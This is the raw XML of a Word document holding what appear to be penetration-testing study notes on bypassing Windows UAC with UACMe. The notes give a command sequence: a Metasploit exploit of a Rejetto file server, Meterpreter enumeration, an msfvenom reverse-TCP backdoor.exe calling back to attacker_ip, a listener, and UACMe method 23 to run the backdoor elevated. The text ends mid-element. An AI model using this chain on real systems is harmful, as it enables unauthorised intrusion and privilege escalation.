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1C1A" w14:textId="08D0983D" w:rsidR="00853ABF" w:rsidRPr="00C92E82" w:rsidRDefault="00C35051">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk207276008"/>
      <w:r w:rsidRPr="00C92E82">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bypassing UAC With </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C92E82">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UACMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C92E82">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="05148559" w14:textId="4DF30288" w:rsidR="00C35051" w:rsidRDefault="00C92E82">
      <w:r>
        <w:t>User account control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008D13EA" w14:textId="757137F8" w:rsidR="00C92E82" w:rsidRDefault="00C92E82">
      <w:r>
        <w:t>Efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410FDD52" w14:textId="77777777" w:rsidR="00C92E82" w:rsidRDefault="00C92E82"/>
    <w:p w14:paraId="5F2FB5F9" w14:textId="104F6986" w:rsidR="00C92E82" w:rsidRDefault="00C92E82">
      <w:r>
        <w:t xml:space="preserve">Attacker bypass UAC </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> execute malicious executables with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7E1E6B" w14:textId="77777777" w:rsidR="00C92E82" w:rsidRDefault="00C92E82"/>
    <w:p w14:paraId="136E9A60" w14:textId="70F9E90A" w:rsidR="00DF2375" w:rsidRDefault="00467458">
      <w:r>
        <w:t xml:space="preserve">Tool and technique </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>depends</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> upon the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>verwion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F51DC7A" w14:textId="5E7FF210" w:rsidR="00467458" w:rsidRDefault="00467458">
      <w:r>
        <w:t>Use to bypass the UAC</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="1" w:name="_Hlk207276013"/>
    <w:p w14:paraId="3E81F3AE" w14:textId="448615E9" w:rsidR="00467458" w:rsidRDefault="00467458">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00467458">
        <w:instrText>https://github.com/hfiref0x/UACME</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E30EF9">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>https://github.com/hfiref0x/UACME</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="46E8CD1B" w14:textId="77777777" w:rsidR="00467458" w:rsidRDefault="00467458"/>
    <w:p w14:paraId="6BBDDF98" w14:textId="40421E0B" w:rsidR="00467458" w:rsidRDefault="00B82539">
      <w:r w:rsidRPr="00B82539">
        <w:t>UACME</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82539">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">all attacker to </w:t>
      </w:r>
      <w:r w:rsidR="00B01206">
        <w:t xml:space="preserve">abuse the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">inbuilt windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B01206" w:rsidRPr="00B82539">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>auteelevate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B01206" w:rsidRPr="00B82539">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> tool</w:t>
      </w:r>
      <w:r w:rsidR="00B01206">
        <w:t>, to execute the malicious program with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575CA129" w14:textId="77777777" w:rsidR="00B82539" w:rsidRDefault="00B82539"/>
    <w:p w14:paraId="3BF54939" w14:textId="4C158643" w:rsidR="00B01206" w:rsidRPr="00127ED9" w:rsidRDefault="00044891">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127ED9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (direct access to the window)</w:t>
      </w:r>
      <w:r w:rsidR="00127ED9" w:rsidRPr="00127ED9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BF2CB9" w14:textId="46040649" w:rsidR="00127ED9" w:rsidRDefault="00D84246">
      <w:r>
        <w:t xml:space="preserve">#To get how many </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> are in the window </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597A7F1B" w14:textId="159595DF" w:rsidR="00D84246" w:rsidRDefault="00D84246">
      <w:r>
        <w:t xml:space="preserve">Net users </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600F4CD9" w14:textId="6124C127" w:rsidR="00D84246" w:rsidRDefault="00D84246">
      <w:r>
        <w:t xml:space="preserve"># to get to know how many of them are </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>member</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of administrative </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DF8761" w14:textId="200D03EE" w:rsidR="00D84246" w:rsidRDefault="00D84246">
      <w:r>
        <w:t xml:space="preserve">Net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAB0E15" w14:textId="77777777" w:rsidR="00D84246" w:rsidRDefault="00D84246"/>
    <w:p w14:paraId="0A0D0DFE" w14:textId="48614FBC" w:rsidR="002F7082" w:rsidRDefault="002F7082">
      <w:r>
        <w:t xml:space="preserve"># you can change the UAC setting by accessing it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>throught</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>manu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6EB02E" w14:textId="77777777" w:rsidR="002F7082" w:rsidRDefault="002F7082"/>
    <w:p w14:paraId="0AC6906F" w14:textId="3FB7B9FC" w:rsidR="00467458" w:rsidRPr="00044891" w:rsidRDefault="00044891">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00044891">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00044891">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00044891">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E13E89C" w14:textId="66AD7CFD" w:rsidR="00044891" w:rsidRDefault="00BA1F91">
      <w:r>
        <w:t>Firstly,</w:t>
      </w:r>
      <w:r w:rsidR="00044891">
        <w:t xml:space="preserve"> we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00044891">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00044891">
        <w:t xml:space="preserve"> find </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00044891">
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00044891">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vulnerable</w:t>
      </w:r>
      <w:r w:rsidR="00044891">
        <w:t xml:space="preserve"> service running on the target and then exploit and then perform the UAC bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62395379" w14:textId="77777777" w:rsidR="00044891" w:rsidRDefault="00044891"/>
    <w:p w14:paraId="283C8831" w14:textId="1EF48DDD" w:rsidR="00BA1F91" w:rsidRDefault="00BA1F91">
      <w:r>
        <w:t xml:space="preserve">Nmap </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47481520" w14:textId="2FD05959" w:rsidR="00BA1F91" w:rsidRDefault="00BA1F91">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># we have </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file server is running on </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the port</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 80 and the version of it is running is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5DB685" w14:textId="77777777" w:rsidR="00BA1F91" w:rsidRDefault="00BA1F91"/>
    <w:p w14:paraId="5466B2B8" w14:textId="01C260C6" w:rsidR="00BA1F91" w:rsidRDefault="00BA1F91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436F091B" w14:textId="1E245048" w:rsidR="00BA1F91" w:rsidRDefault="00BA1F91">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCDA37C" w14:textId="7F176A2B" w:rsidR="00BA1F91" w:rsidRDefault="00BA1F91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7C283D16" w14:textId="54F0AED4" w:rsidR="00BA1F91" w:rsidRDefault="00BA1F91">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F3410FC" w14:textId="0E90C79C" w:rsidR="00BA1F91" w:rsidRDefault="00BA1F91">
      <w:r>
        <w:t>Use (exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E977CA6" w14:textId="251D1A1C" w:rsidR="00BA1F91" w:rsidRDefault="00BA1F91">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2EF4FA" w14:textId="7F3BD54D" w:rsidR="00BA1F91" w:rsidRDefault="00BA1F91">
      <w:r>
        <w:t>Set values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DE5DC3" w14:textId="6509E036" w:rsidR="00BA1F91" w:rsidRDefault="00BA1F91">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7BC21B" w14:textId="77777777" w:rsidR="00BA1F91" w:rsidRDefault="00BA1F91"/>
    <w:p w14:paraId="50AB989E" w14:textId="60405140" w:rsidR="00BA1F91" w:rsidRPr="00BA1F91" w:rsidRDefault="00BA1F91">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1F91">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Meterpreter session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4896D87F" w14:textId="0D86F436" w:rsidR="00BA1F91" w:rsidRDefault="00BA1F91">
      <w:r>
        <w:t>Basic local enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5A8B3" w14:textId="18D6775C" w:rsidR="00BA1F91" w:rsidRDefault="00BA1F91">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24AA249C" w14:textId="77AF403B" w:rsidR="00BA1F91" w:rsidRDefault="00BA1F91">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pgrep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCBEEE5" w14:textId="04F1CC0C" w:rsidR="00BA1F91" w:rsidRDefault="00815DFB">
      <w:r>
        <w:t>Migrate (PID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF9DB57" w14:textId="7CF9B063" w:rsidR="00815DFB" w:rsidRDefault="00815DFB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A544F5F" w14:textId="258FED5F" w:rsidR="00815DFB" w:rsidRDefault="00815DFB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F0939D2" w14:textId="0F4459FE" w:rsidR="00815DFB" w:rsidRDefault="00815DFB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getprivs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C6F0AFB" w14:textId="7B8FBC64" w:rsidR="00815DFB" w:rsidRDefault="00F2719F">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743D2F8B" w14:textId="13F26808" w:rsidR="00F2719F" w:rsidRDefault="00F2719F">
      <w:r>
        <w:t>Net user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BE1EE8" w14:textId="0533AE5A" w:rsidR="00F2719F" w:rsidRDefault="00F2719F">
      <w:r>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FA1F86" w14:textId="7CC74ABE" w:rsidR="00BA1F91" w:rsidRDefault="00051210">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>now</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to change the password of the current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECAADC0" w14:textId="0B9A60CB" w:rsidR="00051210" w:rsidRDefault="00051210">
      <w:r>
        <w:t>Net user admin password123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1612D803" w14:textId="4796988B" w:rsidR="00051210" w:rsidRDefault="00051210">
      <w:r>
        <w:t xml:space="preserve"># it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the access denied because we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> check the UAC box </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>th</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> complete it which is not possible </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>throught</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the shell.</w:t>
      </w:r>
      <w:r w:rsidR="00F32663">
        <w:t>so,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C5A56D" w14:textId="215D547B" w:rsidR="000E1671" w:rsidRDefault="000E1671">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Exit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB0226C" w14:textId="2661A8CB" w:rsidR="000E1671" w:rsidRPr="005201CA" w:rsidRDefault="000E1671">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005201CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005201CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>back</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005201CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005201CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="756A57BA" w14:textId="68AD16C0" w:rsidR="000E1671" w:rsidRPr="000E1671" w:rsidRDefault="000E1671">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000E1671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">generate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E1671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E1671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8127AC" w14:textId="79524F0D" w:rsidR="000E1671" w:rsidRDefault="000E1671">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  LHOST</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LPORT=1234 -f exe &gt;backdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E04318" w14:textId="6D01DC94" w:rsidR="000E1671" w:rsidRDefault="000E1671">
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B45A69" w14:textId="77777777" w:rsidR="000E1671" w:rsidRDefault="000E1671"/>
    <w:p w14:paraId="15719834" w14:textId="6FC6827D" w:rsidR="000E1671" w:rsidRPr="000E1671" w:rsidRDefault="000E1671">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E1671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCF6072" w14:textId="7BC2D4BA" w:rsidR="000E1671" w:rsidRDefault="000E1671">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3727256F" w14:textId="43644CE3" w:rsidR="000E1671" w:rsidRDefault="000E1671">
      <w:r>
        <w:t>use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170660F8" w14:textId="7A4FEDFC" w:rsidR="000E1671" w:rsidRDefault="000E1671">
      <w:r>
        <w:t xml:space="preserve">set payload </w:t>
      </w:r>
      <w:r>
        <w:t>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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615259FF" w14:textId="2DAA9307" w:rsidR="000E1671" w:rsidRDefault="000E1671">
      <w:r>
        <w:t xml:space="preserve">set LHOST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71B2C8F5" w14:textId="22E4EF15" w:rsidR="000E1671" w:rsidRDefault="000E1671">
      <w:r>
        <w:t>set LPORT 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E77AB4" w14:textId="5E6F51CF" w:rsidR="000E1671" w:rsidRDefault="000E1671">
      <w:r>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4037CE36" w14:textId="3A5B46EA" w:rsidR="000E1671" w:rsidRDefault="000E1671">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>settes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> values must be same as that we set during creating the payload with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FB4A76" w14:textId="77777777" w:rsidR="000E1671" w:rsidRDefault="000E1671"/>
    <w:p w14:paraId="07932D69" w14:textId="4D2A0BFE" w:rsidR="005201CA" w:rsidRPr="005201CA" w:rsidRDefault="005201CA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005201CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Back to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005201CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005201CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5CE700" w14:textId="3FF7ACDD" w:rsidR="005201CA" w:rsidRDefault="005201CA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46023FA8" w14:textId="1750A1D0" w:rsidR="005201CA" w:rsidRDefault="005201CA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B8D871A" w14:textId="72D5ED13" w:rsidR="005201CA" w:rsidRDefault="005201CA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getprivs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E824F01" w14:textId="4D6F4BEF" w:rsidR="005201CA" w:rsidRDefault="005201CA">
      <w:r>
        <w:t>Cd c:\\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22356065" w14:textId="48A95712" w:rsidR="005201CA" w:rsidRDefault="005201CA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mkdirTemp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1FBCFADC" w14:textId="76C1860D" w:rsidR="005201CA" w:rsidRDefault="005201CA">
      <w:r>
        <w:t>cd temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB27E1F" w14:textId="0E3B2D7F" w:rsidR="005201CA" w:rsidRDefault="005201CA">
      <w:r>
        <w:t>upload backdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C08521B" w14:textId="3CE28497" w:rsidR="005201CA" w:rsidRDefault="005201CA">
      <w:r>
        <w:t>upload akagai64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B0D19F" w14:textId="3A793ADF" w:rsidR="005201CA" w:rsidRDefault="005201CA">
      <w:r>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095C6C21" w14:textId="6F80D4BD" w:rsidR="005201CA" w:rsidRDefault="005201CA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6CA03524" w14:textId="1D09E9FD" w:rsidR="005201CA" w:rsidRDefault="005201CA">
      <w:r>
        <w:t xml:space="preserve">bypass UAC by using </w:t>
      </w:r>
      <w:r>
        <w:t>method 23.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7712052F" w14:textId="092E37D8" w:rsidR="005201CA" w:rsidRDefault="005201CA">
      <w:r>
        <w:t>Akagai64.exe 23 c:\temp\backdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0645853F" w14:textId="35CB3D15" w:rsidR="005201CA" w:rsidRDefault="005201CA">
      <w:r>
        <w:t xml:space="preserve"># it will give </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>listner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC31C7E" w14:textId="51D1FA11" w:rsidR="005201CA" w:rsidRPr="005201CA" w:rsidRDefault="005201CA">
      <w:pPr>
        <w:rPr>
          <w:b/>
